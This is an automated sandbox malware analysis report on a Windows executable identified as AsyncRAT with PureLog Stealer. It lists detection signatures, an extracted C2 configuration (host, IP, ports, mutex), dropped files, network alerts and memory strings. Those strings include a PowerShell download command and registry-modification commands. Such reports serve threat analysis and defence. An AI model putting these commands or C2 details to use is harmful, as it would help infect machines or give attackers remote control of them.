Windows Analysis Report
Gm602axA2d.exe

Overview

General Information

Sample name: Gm602axA2d.exe
(renamed because the original name is a hash value)
Original sample name: 2d25ca067a272bd8542cabe1ff9985d1.exe
Analysis ID: 1433165
MD5: 2d25ca067a272bd8542cabe1ff9985d1
SHA1: 594fb8d239a5ffaa654a13415fa95965ba47d2a8
SHA256: da3a59fdb9f1414f6d726429c609ea5b6377c9d96d22ffb13f75352eec6be3a4
Tags: AsyncRAT, exe, RAT

Detection

AsyncRAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected PureLog Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ProcessChecker
Yara signature match

Classification

Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

AV Detection

Source: Gm602axA2d.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: https://msfree.su/donaties/donations.html Avira URL Cloud: Label: malware
Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": "5512.sytes.net,95.211.208.153", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "Llg9a02PERRO", "Autorun": "false", "Group": "null"}
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Virustotal: Detection: 63%
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Virustotal: Detection: 63%
Source: Gm602axA2d.exe ReversingLabs: Detection: 76%
Source: Gm602axA2d.exe Virustotal: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Joe Sandbox ML: detected
Source: Gm602axA2d.exe Joe Sandbox ML: detected
Source: Gm602axA2d.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP
Source: Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
Source: Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP

Networking

Source: Traffic Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 95.211.208.153:7707 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 95.211.208.153:7707 -> 192.168.2.4:49731
Source: Malware configuration extractor URLs: 5512.sytes.net
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 95.211.208.153:7707
Source: Joe Sandbox View ASN Name: LEASEWEB-NL-AMS-01 (Netherlands, NL)
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: powershell.exe, 00000001.00000002.2099977304.00000000089E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: AppLaunch.exe, 0000000A.00000002.2916185361.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: AppLaunch.exe, 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab-
Source: powershell.exe, 00000008.00000002.1764715241.000002B401622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mrodevicemgr.officeapps.live.com
Source: powershell.exe, 00000001.00000002.1917313694.000000000634B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B410075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B4018F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1764715241.000002B401622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://prod.mrodevicemgr.live.com.akadns.net
Source: powershell.exe, 00000001.00000002.1769593874.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1769593874.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B400001000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1769593874.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.vmware.com/0
Source: powershell.exe, 00000008.00000002.1764715241.000002B400001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1769593874.00000000052E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2181412356.0000000007047000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2248433326.0000000007907000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000008.00000002.1764715241.000002B400C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1764715241.000002B40161C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B400C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com
Source: powershell.exe, 00000008.00000002.2284007759.000002B46B670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305831877.000002B46B740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData
Source: powershell.exe, 00000008.00000002.2317858397.000002B46D5BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseDataEM32
Source: powershell.exe, 00000008.00000002.2322618080.000002B46D630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/c2rreleasedata
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: https://msfree.su/donaties/donations.html
Source: powershell.exe, 00000001.00000002.1917313694.000000000634B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B410075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B4018F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR

System Summary

